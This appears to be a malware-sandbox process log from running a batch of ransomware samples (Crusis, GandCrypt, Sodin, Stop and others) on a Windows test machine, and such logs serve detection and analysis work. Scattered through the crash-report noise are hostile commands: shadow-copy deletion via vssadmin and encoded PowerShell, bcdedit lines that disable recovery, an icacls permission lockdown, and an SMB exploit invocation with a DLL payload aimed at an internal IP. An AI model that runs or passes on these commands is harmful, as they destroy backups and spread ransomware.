C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"6⤵PID:41880
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 41880 -s 9407⤵PID:41072
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"6⤵PID:41720
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 41720 -s 9407⤵PID:41168
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"6⤵PID:41748
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 41748 -s 9607⤵PID:41136
-
-
-
-
-
-
C:\Users\Admin\Desktop\00379\Trojan-Ransom.Win32.Crusis.drf-b487fe8e47700d12c942141d1c0776e8e2521640717b062bc434702d72ad92b4.exeTrojan-Ransom.Win32.Crusis.drf-b487fe8e47700d12c942141d1c0776e8e2521640717b062bc434702d72ad92b4.exe3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:4300 -
C:\Users\Admin\Desktop\00379\Trojan-Ransom.Win32.Crusis.drf-b487fe8e47700d12c942141d1c0776e8e2521640717b062bc434702d72ad92b4.exeC:\Users\Admin\Desktop\00379\Trojan-Ransom.Win32.Crusis.drf-b487fe8e47700d12c942141d1c0776e8e2521640717b062bc434702d72ad92b4.exe4⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
PID:4416 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe"5⤵PID:5868
-
C:\Windows\system32\mode.commode con cp select=12516⤵PID:10556
-
-
C:\Windows\system32\vssadmin.exevssadmin delete shadows /all /quiet6⤵
- Interacts with shadow copies
PID:11452
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe"5⤵PID:10840
-
C:\Windows\system32\mode.commode con cp select=12516⤵PID:10236
-
-
C:\Windows\system32\vssadmin.exevssadmin delete shadows /all /quiet6⤵
- Interacts with shadow copies
PID:9628
-
-
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta"5⤵PID:6504
-
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta"5⤵PID:5784
-
-
-
-
C:\Users\Admin\Desktop\00379\Trojan-Ransom.Win32.CryFile.zzl-d781d8a94e02093ccdb2e4b698582b3a1ea42b154829794b430f649fe12870f2.exeTrojan-Ransom.Win32.CryFile.zzl-d781d8a94e02093ccdb2e4b698582b3a1ea42b154829794b430f649fe12870f2.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3164 -
C:\Users\All Users\mmkt.exe"C:\Users\All Users\mmkt.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3264
-
-
C:\Sicck.exe"C:\Sicck.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4700
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cd /D C:\Users\Alluse~1\&blue.exe --TargetIp 10.127.0.112 & star.exe --OutConfig a --TargetPort 445 --Protocol SMB --Architecture x64 --Function RunDLL --DllPayload down64.dll --TargetIp 10.127.0.1124⤵PID:9020
-
C:\Users\ALLUSE~1\blue.exeblue.exe --TargetIp 10.127.0.1125⤵PID:8184
-
-
C:\Users\ALLUSE~1\star.exestar.exe --OutConfig a --TargetPort 445 --Protocol SMB --Architecture x64 --Function RunDLL --DllPayload down64.dll --TargetIp 10.127.0.1125⤵PID:8596
-
-
-
-
C:\Users\Admin\Desktop\00379\Trojan-Ransom.Win32.DigiPog.ep-fdbe5f69bb19bd05372847a7e3aa3196bfbd2cf620baec58bb8ac42c995a61ac.exeTrojan-Ransom.Win32.DigiPog.ep-fdbe5f69bb19bd05372847a7e3aa3196bfbd2cf620baec58bb8ac42c995a61ac.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2636
-
-
C:\Users\Admin\Desktop\00379\Trojan-Ransom.Win32.GandCrypt.jcc-45a2cc9060b21404632f07ee468d105ccd42075feb680f00d3aa1c20a19d272a.exeTrojan-Ransom.Win32.GandCrypt.jcc-45a2cc9060b21404632f07ee468d105ccd42075feb680f00d3aa1c20a19d272a.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Checks processor information in registry
PID:2712
-
-
C:\Users\Admin\Desktop\00379\Trojan-Ransom.Win32.GandCrypt.jdv-0d641a6e15a1b393fa49c6c2e98ada6e7a04a9163667f667d3776786515d0991.exeTrojan-Ransom.Win32.GandCrypt.jdv-0d641a6e15a1b393fa49c6c2e98ada6e7a04a9163667f667d3776786515d0991.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Checks processor information in registry
PID:4232
-
-
C:\Users\Admin\Desktop\00379\Trojan-Ransom.Win32.GandCrypt.jes-79967e1aba8d8bd41f5fa97871f496ff3d7dcaf66d879d0134c6f9d056010697.exeTrojan-Ransom.Win32.GandCrypt.jes-79967e1aba8d8bd41f5fa97871f496ff3d7dcaf66d879d0134c6f9d056010697.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Checks processor information in registry
PID:4032
-
-
C:\Users\Admin\Desktop\00379\Trojan-Ransom.Win32.Sodin.aaz-47e05f24669a0ffd7ca461aaf7e76e0b6e17f6cf424e4d854ddc584ee26ef42c.exeTrojan-Ransom.Win32.Sodin.aaz-47e05f24669a0ffd7ca461aaf7e76e0b6e17f6cf424e4d854ddc584ee26ef42c.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4004 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==4⤵PID:5760
-
-
-
C:\Users\Admin\Desktop\00379\Trojan-Ransom.Win32.Sodin.abv-6e5f225b72d932fa68cafd3e0366298d5b1b92098049dcf01f6e3f2ad0f9b92e.exeTrojan-Ransom.Win32.Sodin.abv-6e5f225b72d932fa68cafd3e0366298d5b1b92098049dcf01f6e3f2ad0f9b92e.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2476
-
-
C:\Users\Admin\Desktop\00379\Trojan-Ransom.Win32.Sodin.adh-a8330e4e9ae277220a20ab4fd818495b3e6ff997f2a07215435d4f6262eccdcd.exeTrojan-Ransom.Win32.Sodin.adh-a8330e4e9ae277220a20ab4fd818495b3e6ff997f2a07215435d4f6262eccdcd.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2864 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2864 -s 2844⤵
- Program crash
PID:1624
-
-
-
C:\Users\Admin\Desktop\00379\Trojan-Ransom.Win32.Sodin.alx-f87cc35fedf1bcfa47f9df0d08bbc0d6741f46241a214dbdfa6b2ae6ac09068a.exeTrojan-Ransom.Win32.Sodin.alx-f87cc35fedf1bcfa47f9df0d08bbc0d6741f46241a214dbdfa6b2ae6ac09068a.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4440 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4440 -s 2364⤵
- Program crash
PID:1208
-
-
-
C:\Users\Admin\Desktop\00379\Trojan-Ransom.Win32.Sodin.ax-a8309e454d9177a8fe2c84c79925fa800282f9fde2413f219dbf60fc77dd37a1.exeTrojan-Ransom.Win32.Sodin.ax-a8309e454d9177a8fe2c84c79925fa800282f9fde2413f219dbf60fc77dd37a1.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4392 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==4⤵PID:13708
-
-
-
C:\Users\Admin\Desktop\00379\Trojan-Ransom.Win32.Sodin.bb-20684d3edd9d61bbe0a84559c8e197a02a123e697bc8d05bd9305cf1d3984c15.exeTrojan-Ransom.Win32.Sodin.bb-20684d3edd9d61bbe0a84559c8e197a02a123e697bc8d05bd9305cf1d3984c15.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4676 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /All /Quiet & bcdedit /set {default} recoveryenabled No & bcdedit /set {default} bootstatuspolicy ignoreallfailures4⤵PID:14828
-
-
-
C:\Users\Admin\Desktop\00379\Trojan-Ransom.Win32.Stop.in-488fc31a56df22ee62120505326df0699627525c17fbdde472437f447ba2b779.exeTrojan-Ransom.Win32.Stop.in-488fc31a56df22ee62120505326df0699627525c17fbdde472437f447ba2b779.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3552 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3552 -s 8684⤵
- Program crash
PID:1648
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3552 -s 8764⤵
- Program crash
PID:4032
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3552 -s 8964⤵
- Program crash
PID:224
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3552 -s 8804⤵
- Program crash
PID:5324
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3552 -s 9684⤵
- Program crash
PID:5864
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3552 -s 9724⤵
- Program crash
PID:5360
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3552 -s 16044⤵
- Program crash
PID:7712
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3552 -s 15884⤵
- Program crash
PID:7072
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3552 -s 16644⤵
- Program crash
PID:9536
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3552 -s 16044⤵
- Program crash
PID:7460
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3552 -s 19044⤵
- Program crash
PID:12016
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3552 -s 16084⤵
- Program crash
PID:12012
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3552 -s 17444⤵
- Program crash
PID:9308
-
-
C:\Users\Admin\Desktop\00379\Trojan-Ransom.Win32.Stop.in-488fc31a56df22ee62120505326df0699627525c17fbdde472437f447ba2b779.exe"C:\Users\Admin\Desktop\00379\Trojan-Ransom.Win32.Stop.in-488fc31a56df22ee62120505326df0699627525c17fbdde472437f447ba2b779.exe" --Admin IsNotAutoStart IsNotTask4⤵PID:9640
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9640 -s 7965⤵
- Program crash
PID:7616
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9640 -s 8045⤵
- Program crash
PID:7732
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9640 -s 8845⤵
- Program crash
PID:12008
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9640 -s 8925⤵
- Program crash
PID:8296
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9640 -s 10405⤵
- Program crash
PID:9500
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9640 -s 10885⤵
- Program crash
PID:7532
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9640 -s 13525⤵
- Program crash
PID:4080
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9640 -s 14445⤵
- Program crash
PID:10220
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9640 -s 18045⤵
- Program crash
PID:6252
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9640 -s 15965⤵
- Program crash
PID:928
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9640 -s 18085⤵
- Program crash
PID:11640
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9640 -s 18045⤵
- Program crash
PID:11848
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9640 -s 18205⤵
- Program crash
PID:9176
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9640 -s 17685⤵PID:6920
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9640 -s 16365⤵PID:12276
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9640 -s 18165⤵PID:8116
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9640 -s 17685⤵PID:2716
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9640 -s 17925⤵PID:14536
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9640 -s 18405⤵PID:14932
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9640 -s 16605⤵PID:15936
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9640 -s 17685⤵PID:18880
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9640 -s 8405⤵PID:23540
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9640 -s 14045⤵PID:25808
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9640 -s 10405⤵PID:28148
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9640 -s 13725⤵PID:25360
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3552 -s 19124⤵
- Program crash
PID:6944
-
-
-
C:\Users\Admin\Desktop\00379\Trojan-Ransom.Win32.Stop.kz-51279cf0dd0716de867e5bc706ef180f4ff1ed62e56c8a5858565408f41423c5.exeTrojan-Ransom.Win32.Stop.kz-51279cf0dd0716de867e5bc706ef180f4ff1ed62e56c8a5858565408f41423c5.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3192 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 8604⤵
- Program crash
PID:5668
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 8684⤵
- Program crash
PID:5332
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 9124⤵
- Program crash
PID:8168
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 9204⤵
- Program crash
PID:7056
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 10964⤵
- Program crash
PID:3412
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 11204⤵
- Program crash
PID:9748
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 13804⤵
- Program crash
PID:10916
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 16204⤵
- Program crash
PID:9316
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 16804⤵
- Program crash
PID:7072
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 16364⤵
- Program crash
PID:5696
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 18404⤵
- Program crash
PID:1360
-
-
C:\Users\Admin\Desktop\00379\Trojan-Ransom.Win32.Stop.kz-51279cf0dd0716de867e5bc706ef180f4ff1ed62e56c8a5858565408f41423c5.exe"C:\Users\Admin\Desktop\00379\Trojan-Ransom.Win32.Stop.kz-51279cf0dd0716de867e5bc706ef180f4ff1ed62e56c8a5858565408f41423c5.exe" --Admin IsNotAutoStart IsNotTask4⤵PID:8308
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8308 -s 7925⤵
- Program crash
PID:9104
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8308 -s 8325⤵
- Program crash
PID:1284
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8308 -s 8645⤵
- Program crash
PID:11012
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8308 -s 9285⤵
- Program crash
PID:7808
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8308 -s 10645⤵
- Program crash
PID:8140
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8308 -s 10765⤵
- Program crash
PID:11800
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8308 -s 13205⤵
- Program crash
PID:9000
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8308 -s 15605⤵
- Program crash
PID:6196
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8308 -s 16325⤵
- Program crash
PID:8068
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8308 -s 18165⤵PID:7544
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8308 -s 16485⤵PID:8464
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8308 -s 16525⤵PID:12296
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8308 -s 18405⤵PID:12736
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8308 -s 16765⤵PID:13020
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8308 -s 18325⤵PID:14016
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8308 -s 16765⤵PID:1260
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8308 -s 18125⤵PID:15664
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8308 -s 18045⤵PID:16228
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8308 -s 16285⤵PID:19988
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8308 -s 7965⤵PID:22760
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8308 -s 18405⤵PID:28220
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8308 -s 17965⤵PID:25340
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 17044⤵
- Program crash
PID:2440
-
-
-
C:\Users\Admin\Desktop\00379\Trojan-Ransom.Win32.Stop.ln-c68ff2b64fe8310e584f0680e62c1283df48af9d09be486feaa820b57090e79c.exeTrojan-Ransom.Win32.Stop.ln-c68ff2b64fe8310e584f0680e62c1283df48af9d09be486feaa820b57090e79c.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:2828 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\5198ff1b-df14-4fbf-b4e5-7d3b448b8b11" /deny *S-1-1-0:(OI)(CI)(DE,DC)4⤵
- Modifies file permissions
PID:9872
-
-
C:\Users\Admin\Desktop\00379\Trojan-Ransom.Win32.Stop.ln-c68ff2b64fe8310e584f0680e62c1283df48af9d09be486feaa820b57090e79c.exe"C:\Users\Admin\Desktop\00379\Trojan-Ransom.Win32.Stop.ln-c68ff2b64fe8310e584f0680e62c1283df48af9d09be486feaa820b57090e79c.exe" --Admin IsNotAutoStart IsNotTask4⤵PID:12164
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 12164 -s 16685⤵PID:28172
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2828 -s 16764⤵
- Program crash
PID:8508
-
-
-
C:\Users\Admin\Desktop\00379\UDS-Trojan-Ransom.Win32.GandCrypt.a-ecffab4f2c602dc448fc660d951c597bece58b709d98ee6ff03c3010473ffeee.exeUDS-Trojan-Ransom.Win32.GandCrypt.a-ecffab4f2c602dc448fc660d951c597bece58b709d98ee6ff03c3010473ffeee.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Enumerates connected drives
- System Location Discovery: System Language Discovery
- Checks processor information in registry
PID:2088
-
-
-
C:\Windows\SysWOW64\bmlplan.exe"C:\Windows\SysWOW64\bmlplan.exe"1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2660 -
C:\Windows\SysWOW64\bmlplan.exe--3b4664a02⤵
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:1896
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 4440 -ip 44401⤵PID:224
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\YEYFQM-MANUAL.txt1⤵PID:2000
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 2864 -ip 28641⤵PID:3112
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 3552 -ip 35521⤵PID:464
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 188 -p 3552 -ip 35521⤵PID:2340
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 3552 -ip 35521⤵PID:928
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3552 -ip 35521⤵PID:5236
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 3192 -ip 31921⤵PID:5592
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 3552 -ip 35521⤵PID:5748
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 3192 -ip 31921⤵PID:1160
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 3552 -ip 35521⤵PID:5520
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5592
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 3192 -ip 31921⤵PID:6484
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 3552 -ip 35521⤵PID:8084
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 3192 -ip 31921⤵PID:10012
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 3552 -ip 35521⤵PID:9704
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Public\Desktop\YEYFQM-MANUAL.txt1⤵PID:8228
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵PID:8636
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 3192 -ip 31921⤵PID:9228
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 3552 -ip 35521⤵PID:9400
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 3192 -ip 31921⤵PID:11668
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k PrintWorkflow -s PrintWorkflowUserSvc1⤵PID:11496
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 2828 -ip 28281⤵PID:9516
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 3552 -ip 35521⤵PID:8060
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 10624 -ip 106241⤵PID:8648
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 3192 -ip 31921⤵PID:7172
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 188 -p 3552 -ip 35521⤵PID:10424
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 3192 -ip 31921⤵PID:9496
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 12188 -ip 121881⤵PID:6052
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 3192 -ip 31921⤵PID:5332
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 3552 -ip 35521⤵PID:6328
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 9680 -ip 96801⤵PID:9360
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 3552 -ip 35521⤵PID:9552
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 3192 -ip 31921⤵PID:11228
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 10128 -ip 101281⤵PID:3244
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 3552 -ip 35521⤵PID:11868
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 3192 -ip 31921⤵PID:7164
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 9640 -ip 96401⤵PID:6632
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 6384 -ip 63841⤵PID:10368
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 3192 -ip 31921⤵PID:7648
-
